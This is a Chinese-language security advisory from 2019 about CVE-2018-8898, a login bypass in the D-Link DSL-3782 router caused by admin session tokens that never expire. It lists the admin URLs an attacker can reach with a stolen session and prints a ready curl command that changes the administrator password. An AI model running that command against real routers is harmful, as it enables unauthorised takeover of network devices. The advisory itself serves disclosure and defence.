【漏洞预警】| D-Link DSL-3782 WEB管理登录绕过漏洞(CVE-2018-8898)

任子行2019-01-14 10:58:52


一、漏洞概述

  D-Link 无线路由器DSL-3782的web管理页面存在登录绕过的漏洞,该路由器的web服务对认证信息中的token没有设置过期时间,仅仅只是在服务端设置了一个几分钟的超时时间。

  在管理员登录之后,攻击者通过某种手段可以窃取管理员登录的会话信息,从而利用该登录凭证以管理员权限执行任意操作(修改管理、路由器密码等)。

二、漏洞详情
厂商名称D-LINK
影响型号DSL-3782
漏洞编号CVE-2018-8898
漏洞描述WEB服务没有设置token过期时间,攻击者可窃取登录token做非法操作


攻击者可通过获取到的SessionID,通过以下的url进行一些非法操作:

http://192.168.1.1/romfile.cfg --------------修改路由器配置

http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp ----------修改wifi密码

http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp ---------修改5G wifi密码


且wab服务没有验证请求的来源,攻击者可以利用中间人攻击诱导管理员访问url: http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp获取sessionkey,再构造post请求更改管理员密码:

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" --data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp


三、修复手段

  目前D-Link暂未给出固件更新,该漏洞暂无修复手段。需要警惕中间人攻击,路由器管理工作不要访问来源不明的url。


参考链接:

https://www.exploit-db.com/exploits/44657/

关于SURFSRC

  任子行网络安全攻防实验室(SURFSRC)成立于2017年,以网络安全攻防技术为核心,专注于网络安全技术研究及安全攻防体系搭建。

  实验室重点关注APT攻击与防御技术、恶意代码对抗、基于主机与网络的取证技术、网络恶意流量检测、二进制漏洞攻防、非接触式移动端漏洞与攻击(包括Android和iOS平台上的Wi-Fi、蓝牙等)以及Web安全研究等前沿网络安全技术、网络攻防渗透、恶意攻击溯源等网络信息安全攻防技术研究与应用,洞察网络安全前沿威胁,提升企业运维安全效率,为企业网络信息安全护航。


Copyright © 温县电话机虚拟社区@2017